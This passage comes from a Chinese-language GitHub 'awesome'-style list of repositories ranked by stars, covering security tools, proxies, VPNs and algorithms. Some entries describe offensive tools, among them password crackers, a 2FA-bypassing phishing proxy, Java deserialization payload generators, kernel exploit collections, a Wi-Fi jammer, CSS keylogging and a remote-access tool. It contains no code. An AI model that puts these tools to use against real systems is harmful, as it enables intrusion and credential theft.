用Node.js编写的快速HTTP/1.1基准测试工具\n- [**3458**星][11d] [Go] [imgproxy/imgproxy](https://github.com/imgproxy/imgproxy) Fast and secure standalone server for resizing and converting remote images\n- [**3451**星][4m] [C] [vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra) 网络登录破解,支持多种服务。一个概念代码的证明,让研究人员和安全顾问有可能展示从远程获取系统的未授权访问是多么容易。\n- [**3448**星][10d] [C] [raspberrypi/firmware](https://github.com/raspberrypi/firmware) 预编译的二进制文件的当前树莓派内核和模块,用户空间库,和引导加载程序/GPU固件。\n- [**3445**星][10d] [C] [nbs-system/naxsi](https://github.com/nbs-system/naxsi) 一个开源,高性能,低规则维护的NGINX WAF\n- [**3443**星][4m] [Rust] [canop/broot](https://github.com/canop/broot) A new way to see and navigate directory trees :\n- [**3440**星][10d] [C] [unicorn-engine/unicorn](https://github.com/unicorn-engine/unicorn) CPU仿真器框架\n- [**3435**星][10d] [Makefile] [lorien/awesome-web-scraping](https://github.com/lorien/awesome-web-scraping) List of libraries, tools and APIs for web scraping and data processing.\n- [**3432**星][10d] [icodesign/potatso](https://github.com/icodesign/Potatso) 一个iOS客户端,利用ios10 +的NetworkExtension框架实现不同的代理。\n- [**3432**星][10d] [Shell] [softwaredownload/openwrt-fanqiang](https://github.com/softwaredownload/openwrt-fanqiang) 最好的路由器翻墙、科学上网教程\n- [**3428**星][10d] [Go] [dvyukov/go-fuzz](https://github.com/dvyukov/go-fuzz) 针对Go包的以覆盖为导向的Fuzzing解决方案\n- [**3425**星][11d] [Shell] [hwdsl2/docker-ipsec-vpn-server](https://github.com/hwdsl2/docker-ipsec-vpn-server) 运行一个IPsec VPN服务器的Docker镜像,使用IPsec/L2TP和Cisco IPsec\n- [**3422**星][10d] [Go] [michenriksen/aquatone](https://github.com/michenriksen/aquatone) 可视化的对大量主机上的网站进行探查,方便地快速了解基于HTTP的攻击面\n
\n 查看详情\n\n\n ## Misc\n - 需要Google Chrome/Chromium浏览器\n - 下载编译好的二进制文件,或自己编译\n - 可以通过管道与现有工具集成\n
\n\n\n- [**3420**星][12d] [Java] [oldmanpushcart/greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy) Java诊断工具\n- [**3419**星][8m] [Py] [volatilityfoundation/volatility](https://github.com/volatilityfoundation/volatility) 一个先进的内存取证框架\n- [**3418**星][6m] [ObjC] [objective-see/lulu](https://github.com/objective-see/lulu) 免费的macOS防火墙\n- [**3409**星][5m] [C] [microsoft/windows-driver-samples](https://github.com/microsoft/windows-driver-samples) 驱动程序样本准备与微软Visual Studio和Windows驱动程序工具包(WDK)一起使用。\n- [**3405**星][4m] [Java] [hustcc/js-sorting-algorithm](https://github.com/hustcc/js-sorting-algorithm) 一本关于排序算法的 GitBook 在线书籍 《十大经典排序算法》,多语言实现。\n- [**3396**星][7d] [C] [microsoft/wsl2-linux-kernel](https://github.com/microsoft/wsl2-linux-kernel) The source for the Linux kernel used in Windows Subsystem for Linux 2 (WSL2)\n- [**3395**星][11d] [meirwah/awesome-incident-response](https://github.com/meirwah/awesome-incident-response) A curated list of tools for incident response\n- [**3395**星][11d] [Haskell] [input-output-hk/cardano-sl](https://github.com/input-output-hk/cardano-sl) 实现Ouroboros PoS协议的加密货币\n- [**3393**星][7d] [Vue] [chaitin/xray](https://github.com/chaitin/xray) 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc \n- [**3391**星][10d] [Go] [tencent/bk-cmdb](https://github.com/tencent/bk-cmdb) 蓝鲸智云配置平台(BlueKing CMDB)\n- [**3387**星][10d] [Rust] [spacejam/sled](https://github.com/spacejam/sled) 嵌入式数据库的champagne \n- [**3387**星][10d] [Go] [getlantern/lantern](https://github.com/getlantern/lantern) Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由 \n- [**3384**星][10d] [JS] [evilsocket/pwnagotchi](https://github.com/evilsocket/pwnagotchi) 深度学习+Bettercap,基于A2C,从周围的WiFi环境中学习,以最大程度地利用捕获的WPA关键信息\n- [**3380**星][4m] [Swift] [yagiz/bagel](https://github.com/yagiz/bagel) 一个用于iOS的本地网络调试工具\n- [**3379**星][4m] [C] [magnumripper/johntheripper](https://github.com/magnumripper/johntheripper) John the Ripper官方repo:一个快速的密码破解\n- [**3379**星][2m] [PS] [fireeye/commando-vm](https://github.com/fireeye/commando-vm) 一个完全可定制的基于windows的渗透虚拟机发行版。\n- [**3378**星][10d] [Java] [phishman3579/java-algorithms-implementation](https://github.com/phishman3579/java-algorithms-implementation) Algorithms and Data Structures implemented in Java\n- [**3377**星][10d] [JS] [minbrowser/min](https://github.com/minbrowser/min) 一个快速,最小的浏览器,保护您的隐私\n- [**3369**星][10d] [Py] [drivendata/cookiecutter-data-science](https://github.com/drivendata/cookiecutter-data-science) 一种逻辑的、合理标准化的、但灵活的项目结构,用于执行和共享数据科学工作\n- [**3366**星][11d] [C] [taviso/loadlibrary](https://github.com/taviso/loadlibrary) 使 Linux系统加载并调用 Windows DLL\n- [**3349**星][9d] [C++] [fireice-uk/xmr-stak](https://github.com/fireice-uk/xmr-stak) 免费Monero RandomX矿机和统一CryptoNight矿机\n- [**3340**星][3m] [TS] [jigsaw-code/outline-server](https://github.com/jigsaw-code/outline-server) 在DigitalOcean上创建和管理Outline服务器\n- [**3327**星][10d] [JS] [sindresorhus/speed-test](https://github.com/sindresorhus/speed-test) 使用来自CLI的speedtest.net测试您的internet连接速度和ping\n- [**3325**星][11d] [HTML] [ctf-wiki/ctf-wiki](https://github.com/ctf-wiki/ctf-wiki) 在线的CTF Wiki \n- [**3322**星][4m] [scanate/ethlist](https://github.com/scanate/ethlist) The Comprehensive Ethereum Reading List\n- [**3321**星][10d] [PS] [redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team) 基于MITRE ATT&CK 的检测脚本\n- [**3317**星][10d] [Py] [felixonmars/dnsmasq-china-list](https://github.com/felixonmars/dnsmasq-china-list) Chinese-specific configuration to improve your favorite DNS server. Best partner for chnroutes.\n- [**3312**星][11d] [Py] [pyca/cryptography](https://github.com/pyca/cryptography) 一个用于向Python开发人员公开密码原语和配方的包。\n- [**3310**星][4m] [C++] [spiderlabs/modsecurity](https://github.com/spiderlabs/modsecurity) 用于Apache、IIS和Nginx的跨平台web应用程序防火墙(WAF)引擎\n- [**3301**星][11d] [C] [secwiki/linux-kernel-exploits](https://github.com/secwiki/linux-kernel-exploits) Linux平台提权漏洞集合\n- [**3299**星][12d] [Dockerfile] [thinkdevelop/free-ss-ssr](https://github.com/thinkdevelop/free-ss-ssr) SS账号、SSR账号、V2Ray账号\n- [**3296**星][10d] [Java] [calebfenton/simplify](https://github.com/calebfenton/simplify) Android虚拟机和deobfuscator\n- [**3293**星][3m] [Shell] [1n3/sn1per](https://github.com/1n3/sn1per) 自动化渗透测试框架\n- [**3289**星][10d] [Lua] [ntop/ntopng](https://github.com/ntop/ntopng) 基于Web的流量监控工具\n- [**3288**星][3m] [C] [valdikss/goodbyedpi](https://github.com/valdikss/goodbyedpi) 绕过许多已知的网络服务提供商提供的阻止访问某些网站的深度数据包检查系统\n- [**3282**星][10d] [Py] [corna/me_cleaner](https://github.com/corna/me_cleaner) 英特尔 ME /TXE 固件映像 partial deblobbing 的工具\n- [**3278**星][4m] [C++] [px4/firmware](https://github.com/px4/firmware) PX4无人机飞行控制解决方案\n- [**3271**星][10d] [Go] [meshbird/meshbird](https://github.com/meshbird/meshbird) 云本地多区域多云分散私有网络\n- [**3269**星][15d] [C++] [google/lmctfy](https://github.com/google/lmctfy) 谷歌的容器堆栈的开源版本,它提供Linux应用程序容器。\n- [**3265**星][10d] [C] [processhacker/processhacker](https://github.com/processhacker/processhacker) 监视系统资源,调试软件和检测恶意软件\n- [**3262**星][10d] [TS] [google/incremental-dom](https://github.com/google/incremental-dom) 一个本地DOM Diff库\n- [**3257**星][9m] [C] [yarrick/iodine](https://github.com/yarrick/iodine) 通过DNS服务器传输(tunnel)IPV4数据\n- [**3253**星][5y] [C] [shadowsocks/chinadns](https://github.com/shadowsocks/chinadns) 保护您自己免受DNS中毒\n- [**3250**星][10m] [ObjC] [naituw/ipapatch](https://github.com/naituw/ipapatch) 补丁iOS应用程序,简单的方法,没有越狱。\n- [**3249**星][10d] [Go] [gwuhaolin/lightsocks](https://github.com/gwuhaolin/lightsocks) 轻量级网络混淆代理,基于 SOCKS5 协议,可用来代替 Shadowsocks\n- [**3245**星][4m] [Py] [byt3bl33d3r/crackmapexec](https://github.com/byt3bl33d3r/crackmapexec) 后渗透工具,自动化评估大型Active Directory网络的安全性\n- [**3243**星][11d] [Shell] [speed47/spectre-meltdown-checker](https://github.com/speed47/spectre-meltdown-checker) 检查 Linux 主机是否受处理器漏洞Spectre & Meltdown 的影响\n- [**3239**星][10d] [Shell] [pivpn/pivpn](https://github.com/pivpn/pivpn) 树莓派的OpenVPN安装程序\n- [**3236**星][2y] [CSS] [jbtronics/crookedstylesheets](https://github.com/jbtronics/crookedstylesheets) 使用纯CSS收集网页/用户信息\n- [**3234**星][10d] [Py] [stvir/pysot](https://github.com/stvir/pysot) SenseTime单目标跟踪研究平台,实现SiamRPN、SiamMask等算法。\n- [**3228**星][12d] [Shell] [trimstray/htrace.sh](https://github.com/trimstray/htrace.sh) 瑞士军刀:http/https故障诊断和剖析。\n- [**3227**星][10d] [Py] [kootenpv/whereami](https://github.com/kootenpv/whereami) 使用Wifi信号和机器学习预测你的位置,精确度2-10米\n- [**3222**星][3m] [C++] [0xz0f/z0fcourse_reverseengineering](https://github.com/0xz0f/z0fcourse_reverseengineering) Reverse engineering focusing on x64 Windows.\n- [**3222**星][6m] [Py] [mininet/mininet](https://github.com/mininet/mininet) 用于软件定义网络的快速原型设计的仿真器\n- [**3220**星][2m] [Go] [99designs/aws-vault](https://github.com/99designs/aws-vault) 在开发环境中安全地存储和访问AWS凭据的保险库\n- [**3219**星][10d] [JS] [bkimminich/juice-shop](https://github.com/bkimminich/juice-shop) 可能是最现代和最复杂的Vulnerable的web应用程序\n- [**3217**星][10d] [C] [libfuse/sshfs](https://github.com/libfuse/sshfs) 连接到SSH服务器的网络文件系统客户机\n- [**3213**星][6m] [Java] [deathmarine/luyten](https://github.com/deathmarine/luyten) 用于Procyon的Java反编译器Gui\n- [**3210**星][3y] [shadowsocksr-backup/shadowsocksr-android](https://github.com/shadowsocksr-backup/shadowsocksr-android) Android的ShadowsocksR客户端\n- [**3209**星][10d] [Go] [securego/gosec](https://github.com/securego/gosec) 通过扫描Go源码SAT来检查源代码的安全问题\n- [**3204**星][3m] [C#] [quantconnect/lean](https://github.com/quantconnect/lean) Lean Algorithmic Trading Engine by QuantConnect (C#, Python, F#)\n- [**3202**星][10d] [secwiki/sec-chart](https://github.com/secwiki/sec-chart) 安全思维导图集合\n- [**3200**星][11d] [Shell] [txthinking/google-hosts](https://github.com/txthinking/google-hosts) Google hosts generator\n- [**3197**星][10d] [Py] [tribler/tribler](https://github.com/tribler/tribler) 隐私增强的BitTorrent客户端与P2P内容发现\n- [**3187**星][10d] [Go] [dominikh/go-tools](https://github.com/dominikh/go-tools) Staticcheck - The advanced Go linter\n- [**3180**星][10d] [Py] [gnemoug/distribute_crawler](https://github.com/gnemoug/distribute_crawler) 使用scrapy,redis, mongodb,graphite实现的一个分布式网络爬虫,底层存储mongodb集群,分布式使用redis实现,爬虫状态显示使用graphite实现\n- [**3179**星][3m] [CSS] [readthedocs/sphinx_rtd_theme](https://github.com/readthedocs/sphinx_rtd_theme) Sphinx theme for readthedocs.org\n- [**3176**星][15d] [Ruby] [sagivo/algorithms](https://github.com/sagivo/algorithms) algorithms playground for common questions\n- [**3174**星][10d] [tycrek/degoogle](https://github.com/tycrek/degoogle) A huge list of alternatives to Google products. Privacy tips, tricks, and links.\n- [**3166**星][11d] [Py] [guardicore/monkey](https://github.com/guardicore/monkey) 自动化渗透测试工具, 测试数据中心的弹性, 以防范周边(perimeter)泄漏和内部服务器感染\n- [**3165**星][7d] [Py] [andresriancho/w3af](https://github.com/andresriancho/w3af) Web App安全扫描器, 辅助开发者和渗透测试人员识别和利用Web App中的漏洞\n- [**3157**星][4m] [C] [zmap/zmap](https://github.com/zmap/zmap) 一种快速的单包网络扫描器,用于internet范围的网络调查。\n- [**3150**星][10d] [Py] [trustedsec/ptf](https://github.com/trustedsec/ptf) 创建基于Debian/Ubuntu/ArchLinux的渗透测试环境\n- [**3138**星][4m] [infosecn1nja/red-teaming-toolkit](https://github.com/infosecn1nja/red-teaming-toolkit) A collection of open source and commercial tools that aid in red team operations.\n- [**3137**星][10d] [ObjC] [google/santa](https://github.com/google/santa) 用于Mac系统的二进制文件白名单/黑名单系统\n- [**3133**星][3m] [C#] [microsoft/applicationinspector](https://github.com/microsoft/applicationinspector) A source code analyzer built for surfacing features of interest and other characteristics to answer the question 'what's in it' using static analysis with a json based rules engine. Ideal for scanning components before use or detecting feature level changes.\n- [**3130**星][11d] [Py] [cowrie/cowrie](https://github.com/cowrie/cowrie) 中型/交互型 SSH/Telnet 蜜罐,\n- [**3125**星][10d] [Go] [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) 独立的MITM攻击工具,用于登录凭证钓鱼,可绕过双因素认证\n- [**3123**星][3m] [Go] [aquasecurity/trivy](https://github.com/aquasecurity/trivy) 一个简单而全面的容器漏洞扫描器,适合于CI\n- [**3123**星][3m] [Go] [cookiey/yearning](https://github.com/cookiey/yearning) 一个最流行的mysql sql审计平台\n- [**3120**星][10d] [C] [p-h-c/phc-winner-argon2](https://github.com/p-h-c/phc-winner-argon2) C实现的Argon2,密码hash功能。-\n- [**3120**星][10d] [ObjC] [dantheman827/ios-app-signer](https://github.com/dantheman827/ios-app-signer) 一个OS X的应用程序,可以(重新)签署应用程序,并将它们捆绑到ipa文件中,准备安装在iOS设备上。\n- [**3117**星][7d] [Java] [frohoff/ysoserial](https://github.com/frohoff/ysoserial) 生成会利用不安全的Java对象反序列化的Payload\n- [**3116**星][10d] [JS] [ix64/unlock-music](https://github.com/ix64/unlock-music) Unlock encrypted music file in browser. 在浏览器中解锁加密的音乐文件。\n- [**3111**星][10d] [Py] [espressif/esptool](https://github.com/espressif/esptool) ESP8266和ESP32串行bootloader程序实用程序\n- [**3106**星][7m] [JS] [valve/fingerprintjs](https://github.com/valve/fingerprintjs) 匿名浏览器指纹\n- [**3106**星][10d] [PHP] [owner888/phpspider](https://github.com/owner888/phpspider) 《我用爬虫一天时间“偷了”知乎一百万用户,只为证明PHP是世界上最好的语言 》所使用的程序\n- [**3105**星][10d] [Jupyter Notebook] [zotroneneis/machine_learning_basics](https://github.com/zotroneneis/machine_learning_basics) Plain python implementations of basic machine learning algorithms\n- [**3105**星][10d] [C++] [qv2ray/qv2ray](https://github.com/Qv2ray/Qv2ray) \n- [**3102**星][10d] [C++] [google/robotstxt](https://github.com/google/robotstxt) 存储库包含谷歌的robots.txt解析器和匹配器作为一个c++库(符合c++ 11)。\n- [**3097**星][9m] [Py] [spiderlabs/responder](https://github.com/spiderlabs/responder) LLMNR/NBT-NS/MDNS投毒,内置HTTP/SMB/MSSQL/FTP/LDAP认证服务器, 支持NTLMv1/NTLMv2/LMv2\n- [**3095**星][10d] [Go] [oj/gobuster](https://github.com/oj/gobuster) 爆破:URI/DNS子域名/虚拟主机名\n- [**3087**星][8d] [C++] [xmrig/xmrig](https://github.com/xmrig/xmrig) 门罗币挖矿代码 CPU 版\n- [**3082**星][10d] [Py] [lyst/lightfm](https://github.com/lyst/lightfm) LightFM的Python实现,混合推荐算法\n- [**3078**星][4m] [JS] [webgoat/webgoat](https://github.com/webgoat/webgoat) 带漏洞WebApp\n- [**3077**星][1y] [JS] [jipegit/osxauditor](https://github.com/jipegit/osxauditor) 一个免费的Mac OS X计算机取证工具\n- [**3073**星][10d] [Swift] [zhuhaow/spechtlite](https://github.com/zhuhaow/spechtlite) A rule-based proxy for macOS\n- [**3069**星][10d] [Go] [schollz/croc](https://github.com/schollz/croc) Easily and securely send things from one computer to another\n- [**3061**星][10d] [Py] [cloudflare/flan](https://github.com/cloudflare/flan) A pretty sweet vulnerability scanner\n- [**3060**星][10d] [C++] [qtox/qtox](https://github.com/qtox/qtox) 聊天,语音,视频和文件传输IM客户端使用加密的点对点传输协议\n- [**3032**星][2y] [phith0n/mind-map](https://github.com/phith0n/mind-map) 各种安全相关思维导图整理收集\n- [**3029**星][7d] [Py] [danmcinerney/wifijammer](https://github.com/danmcinerney/wifijammer) 持续劫持范围内的Wifi客户端和AP\n- [**3027**星][10d] [Py] [androguard/androguard](https://github.com/androguard/androguard) Android应用程序的逆向工程、恶意软件和软件分析\n- [**3026**星][10d] [C] [ossec/ossec-hids](https://github.com/ossec/ossec-hids) 入侵检测系统\n- [**3025**星][3m] [Java] [williamfiset/algorithms](https://github.com/williamfiset/algorithms) A collection of algorithms and data structures\n- [**3022**星][10d] [C] [lxc/lxc](https://github.com/lxc/lxc) Linux容器\n- [**3016**星][3m] [Java] [anuken/mindustry](https://github.com/anuken/mindustry) A sandbox tower defense game\n- [**3013**星][4m] [C++] [tensorflow/minigo](https://github.com/tensorflow/minigo) AlphaGoZero 神经网络算法的Python实现版, 非官方版AlphaGo,基于 TensorFlow\n- [**3003**星][11m] [C++] [pytorch/elf](https://github.com/pytorch/elf) 一个带有AlphaGoZero/AlphaZero再实现的游戏研究平台\n- [**2994**星][8d] [Shell] [mskyaxl/wsl-terminal](https://github.com/mskyaxl/wsl-terminal) Linux Windows子系统终端仿真器(WSL)\n- [**2991**星][10d] [ObjC] [facebook/idb](https://github.com/facebook/idb) idb is a flexible command line interface for automating iOS simulators and devices\n- [**2991**星][10d] [Go] [statping/statping](https://github.com/statping/statping) 状态页监测您的网站和应用程序与美丽的图形,分析,和插件。在任何类型的环境中运行。\n- [**2986**星][3m] [C++] [zeek/zeek](https://github.com/zeek/zeek) Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.\n- [**2984**星][10d] [Lua] [loveshell/ngx_lua_waf](https://github.com/loveshell/ngx_lua_waf) 基于lua-nginx-module(openresty)的web应用防火墙\n- [**2983**星][11d] [pditommaso/awesome-pipeline](https://github.com/pditommaso/awesome-pipeline) A curated list of awesome pipeline toolkits inspired by Awesome Sysadmin\n- [**2978**星][10d] [Py] [liuxingming/sinaspider](https://github.com/liuxingming/sinaspider) 新浪微博爬虫(Scrapy、Redis)\n- [**2972**星][10d] [Py] [billryan/algorithm-exercise](https://github.com/billryan/algorithm-exercise) Data Structure and Algorithm notes. 数据结构与算法/leetcode/lintcode题解/\n- [**2969**星][5m] [secfigo/awesome-fuzzing](https://github.com/secfigo/awesome-fuzzing) A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.\n- [**2967**星][11d] [ObjC] [maciekish/iresign](https://github.com/maciekish/iresign) 允许苹果设备应用程序包(.ipa)文件签署或辞职与数字证书从苹果发布\n- [**2958**星][4m] [Shell] [91yun/serverspeeder](https://github.com/91yun/serverspeeder) 锐速破解版\n- [**2953**星][10d] [Py] [instantbox/instantbox](https://github.com/instantbox/instantbox) 在几秒钟内获得一个干净的、准备就绪的Linux机器。\n- [**2947**星][1y] [C++] [wangyu-/udpspeeder](https://github.com/wangyu-/udpspeeder) 通过对所有流量(TCP/UDP/ICMP)使用前向纠错,在高延迟损耗链路上提高网络质量的通道。\n- [**2938**星][2y] [Py] [byt3bl33d3r/mitmf](https://github.com/byt3bl33d3r/mitmf) 中间人攻击的框架\n- [**2932**星][1y] [C#] [quasar/quasarrat](https://github.com/quasar/quasarrat) Windows远程管理工具\n- [**2930**星][10d] [Go] [libp2p/go-libp2p](https://github.com/libp2p/go-libp2p) 在Go中实现libp2p\n- [**2929**星][1y] [C++] [chrisknott/algojammer](https://github.com/chrisknott/algojammer) 一个用于编写算法的实验性代码编辑器\n- [**2927**星][12d] [JS] [laurentj/slimerjs](https://github.com/laurentj/slimerjs) 一个基于Firefox的可编写脚本的浏览器,如PhantomJS\n- [**2926**星][10d] [Go] [caddyserver/certmagic](https://github.com/caddyserver/certmagic) Automatic HTTPS for any Go program: fully-managed TLS certificate issuance and renewal\n- [**2925**星][10d] [valvesoftware/steam-for-linux](https://github.com/valvesoftware/steam-for-linux) Linux beta客户端Steam的问题跟踪\n- [**2922**星][10d] [C] [klange/toaruos](https://github.com/klange/toaruos) 一个完全从头开始的业余爱好操作系统:引导加载程序、内核、驱动程序、C库和用户空间,包括合成的图形用户界面、动态链接器、语法高亮文本编辑器、网络堆栈等。\n- [**2921**星][4m] [C++] [tstack/lnav](https://github.com/tstack/lnav) Log file navigator\n- [**2920**星][11d] [paulsec/awesome-sec-talks](https://github.com/paulsec/awesome-sec-talks) A collected list of awesome security talks\n- [**2920**星][10d] [Go] [google/syzkaller](https://github.com/google/syzkaller) 一个unsupervised、以 coverage 为导向的Linux 系统调用fuzzer\n- [**2918**星][5m] [C#] [vsvim/vsvim](https://github.com/VsVim/VsVim) Vim仿真器插件的Visual Studio 2015+\n- [**2918**星][11d] [Makefile] [theos/theos](https://github.com/theos/theos) 一套跨平台的工具,用于为iOS和其他平台构建和部署软件。\n- [**2916**星][10d] [TS] [webhintio/hint](https://github.com/webhintio/hint) \n- [**2908**星][4m] [C#] [netchx/netch](https://github.com/netchx/netch) 游戏加速器。支持:Socks5, Shadowsocks, ShadowsocksR, V2Ray 协议\n- [**2903**星][10d] [Swift] [kasketis/netfox](https://github.com/kasketis/netfox) 一个轻量级,单行设置,iOS / OSX网络调试库!\n- [**2895**星][4m] [Java] [rovo89/xposedinstaller](https://github.com/rovo89/xposedinstaller) \n- [**2894**星][11d] [Shell] [teddysun/across](https://github.com/teddysun/across) 一个用于配置和启动WireGuard VPN服务器的shell脚本\n- [**2893**星][10d] [Py] [shadowsocksrr/shadowsocksr](https://github.com/shadowsocksrr/shadowsocksr) Python port of ShadowsocksR\n- [**2888**星][7m] [Assembly] [cirosantilli/x86-bare-metal-examples](https://github.com/cirosantilli/x86-bare-metal-examples) 几十个用于学习 x86 系统编程的小型操作系统\n- [**2877**星][12d] [Py] [nryoung/algorithms](https://github.com/nryoung/algorithms) 一个用Python实现的算法和数据结构的库。\n- [**2875**星][4m] [C] [tmk/tmk_keyboard](https://github.com/tmk/tmk_keyboard) Atmel AVR 和 Cortex-M键盘固件收集\n- [**2872**星][10d] [C] [esnet/iperf](https://github.com/esnet/iperf) 一个TCP, UDP和SCTP网络带宽测量工具\n- [**2865**星][10d] [Py] [hugsy/gef](https://github.com/hugsy/gef) gdb增强工具,使用Python API,用于漏洞开发和逆向分析。\n- [**2859**星][4m] [ObjC] [chatsecure/chatsecure-ios](https://github.com/chatsecure/chatsecure-ios) ChatSecure is a free and open source encrypted chat client for iOS that supports OTR and OMEMO encryption over XMPP.\n- [**2857**星][10d] [Py] [rogandawes/p4wnp1](https://github.com/RoganDawes/P4wnP1) 基于Raspberry Pi Zero 或 Raspberry Pi Zero W 的USB攻击平台, 高度的可定制性\n- [**2853**星][2y] [CSS] [maxchehab/css-keylogging](https://github.com/maxchehab/css-keylogging) Chrome扩展和Express服务器利用了CSS的键盘记录功能。\n- [**2852**星][10d] [Py] [plasma-disassembler/plasma](https://github.com/plasma-disassembler/plasma) Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.\n- [**2851**星][10d] [JS] [noble/noble](https://github.com/noble/noble) 一个Node.js BLE(蓝牙低能量)中央模块\n- [**2849**星][10d] [JS] [trufflesuite/ganache-cli](https://github.com/trufflesuite/ganache-cli) Fast Ethereum RPC client for testing and development\n- [**2847**星][4m] [Makefile] [shadowsocks/openwrt-shadowsocks](https://github.com/shadowsocks/openwrt-shadowsocks) Shadowsocks-libev for OpenWrt/LEDE\n- [**2843**星][11d] [Go] [anthonynsimon/bild](https://github.com/anthonynsimon/bild) A collection of parallel image processing algorithms in pure Go\n- [**2842**星][17d] [TS] [microsoftdx/vorlonjs](https://github.com/microsoftdx/vorlonjs) 与平台无关的工具,用于远程调试和测试JavaScript\n- [**2841**星][3m] [Py] [kr1s77/python-crawler-tutorial-starts-from-zero](https://github.com/Kr1s77/Python-crawler-tutorial-starts-from-zero) python爬虫教程,带你从零到一,包含js逆向,selenium, tesseract OCR识别,mongodb的使用,以及scrapy框架\n- [**2838**星][1y] [Py] [p0cl4bs/wifi-pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) AP攻击框架, 创建虚假网络, 取消验证攻击、请求和凭证监控、透明代理、Windows更新攻击、钓鱼管理、ARP投毒、DNS嗅探、Pumpkin代理、动态图片捕获等\n- [**2832**星][1y] [HTML] [ptwobrussell/mining-the-social-web-2nd-edition](https://github.com/ptwobrussell/mining-the-social-web-2nd-edition) The official online compendium for Mining the Social Web, 2nd Edition (O'Reilly, 2013)\n- [**2832**星][10d] [C++] [danmar/cppcheck](https://github.com/danmar/cppcheck) C/ c++代码的静态分析\n- [**2829**星][10d] [Java] [pmd/pmd](https://github.com/pmd/pmd) 一个可扩展的多语言静态代码分析器\n- [**2823**星][4m] [rmusser01/infosec_reference](https://github.com/rmusser01/infosec_reference) An Information Security Reference That Doesn't Suck\n- [**2821**星][3m] [taichi-framework/taichi](https://github.com/taichi-framework/taichi) 一个使用xposed的框架,有或没有Root/解锁引导加载器,支持Android 5.0 ~ 10.0\n- [**2817**星][10d] [JS] [cyu/rack-cors](https://github.com/cyu/rack-cors) 用于处理跨源资源共享(CORS)的机架中间件,这使得跨源AJAX成为可能。\n- [**2813**星][6m] [JS] [s0md3v/awesomexss](https://github.com/s0md3v/AwesomeXSS) Awesome XSS stuff\n- [**2812**星][10d] [C] [vanhoefm/krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) 检测客户端和AP是否受KRACK漏洞影响\n- [**2804**星][2y] [HTML] [chybeta/web-security-learning](https://github.com/chybeta/web-security-learning) Web-Security-Learning\n- [**2800**星][10d] [C] [meituan-dianping/logan](https://github.com/meituan-dianping/logan) Logan is a lightweight case logging system based on mobile platform.\n- [**2794**星][12d] [Py] [hephaest0s/usbkill](https://github.com/hephaest0s/usbkill) 反取证开关. 监控USB端口变化, 有变化时立即关闭计算机\n- [**2789**星][10d] [Py] [pwndbg/pwndbg](https://github.com/pwndbg/pwndbg) GDB插件,辅助漏洞开发和逆向\n- [**2786**星][12d] [Py] [qiwsir/algorithm](https://github.com/qiwsir/algorithm) \n- [**2783**星][10d] [atarity/deploy-your-own-saas](https://github.com/atarity/deploy-your-own-saas) List of \"only yours\" cloud services for everyday needs\n- [**2782**星][2y] [C] [seclab-ucr/intang](https://github.com/seclab-ucr/intang) 为规避来自中国防火墙的“TCP重置攻击”的研究项目(GFW),通过破坏/取消同步审查设备上的TCP控制块(TCB)。\n- [**2777**星][7d] [Py] [xmendez/wfuzz](https://github.com/xmendez/wfuzz) Web应用程序fuzzer\n- [**2775**星][10d] [onlurking/awesome-infosec](https://github.com/onlurking/awesome-infosec) A curated list of awesome infosec courses and training resources.\n- [**2772**星][7d] [HTML] [tikam02/devops-guide](https://github.com/tikam02/devops-guide) DevOps Guide from basic to advanced with Interview Questions and Notes\n- [**2770**星][11d] [C] [geohot/qira](https://github.com/geohot/qira) QEMU Interactive Runtime Analyser\n- [**2770**星][7m] [ObjC] [kjcracks/clutch](https://github.com/kjcracks/clutch) 快速iOS可执行转储程序\n- [**2766**星][10d] [Eagle] [samyk/magspoof](https://github.com/samyk/magspoof) 一种便携式设备,可以“无线”模拟任何磁条、信用卡或酒店卡,甚至在标准的magstripe(非nfc /RFID)读卡器上。它可以禁用芯片和密码,并预测美国运通卡号码与100%的准确性。\n- [**2765**星][8d] [C++] [google/zopfli](https://github.com/google/zopfli) 用C语言编写的一个压缩库,性能非常好,但是速度很慢,压缩或zlib压缩\n- [**2764**星][10d] [Py] [greenwolf/social_mapper](https://github.com/Greenwolf/social_mapper) 对多个社交网站的用户Profile图片进行大规模的人脸识别\n- [**2764**星][12d] [leandromoreira/linux-network-performance-parameters](https://github.com/leandromoreira/linux-network-performance-parameters) 了解一些网络sysctl变量在Linux/内核网络流中的位置\n- [**2733**星][4m] [xairy/linux-kernel-exploitation](https://github.com/xairy/linux-kernel-exploitation) Linux 内核 Fuzz 和漏洞利用的资源收集\n- [**2729**星][10d] [Java] [jboss-javassist/javassist](https://github.com/jboss-javassist/javassist) Java字节码工程工具包\n- [**2725**星][4m] [Shell] [wulabing/v2ray_ws-tls_bash_onekey](https://github.com/wulabing/v2ray_ws-tls_bash_onekey) V2Ray Nginx+vmess+ws+tls/ http2 over tls 一键安装脚本\n- [**2724**星][4m] [JS] [popcorn-official/popcorn-desktop](https://github.com/popcorn-official/popcorn-desktop) Popcorn Time is a multi-platform, free software BitTorrent client that includes an integrated media player. Desktop ( Windows / Mac / Linux ) a Butter-Project Fork\n- [**2724**星][10d] [PHP] [audi-1/sqli-labs](https://github.com/audi-1/sqli-labs) SQLI labs to test error based, Blind boolean based, Time based.\n- [**2723**星][7d] [Py] [ccostan/home-assistantconfig](https://github.com/ccostan/home-assistantconfig) \n- [**2716**星][11d] [Ruby] [arachni/arachni](https://github.com/arachni/arachni) Web应用程序安全扫描程序框架\n- [**2715**星][10d] [Py] [the0demiurge/shadowsocksshare](https://github.com/the0demiurge/shadowsocksshare) 从ss(r)共享网站爬虫获取共享ss(r)账号,通过解析并校验账号连通性,重新分发账号并生成订阅链接\n- [**2713**星][10d] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/FreePAC) 科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程\n- [**2713**星][10d] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/FreePAC) 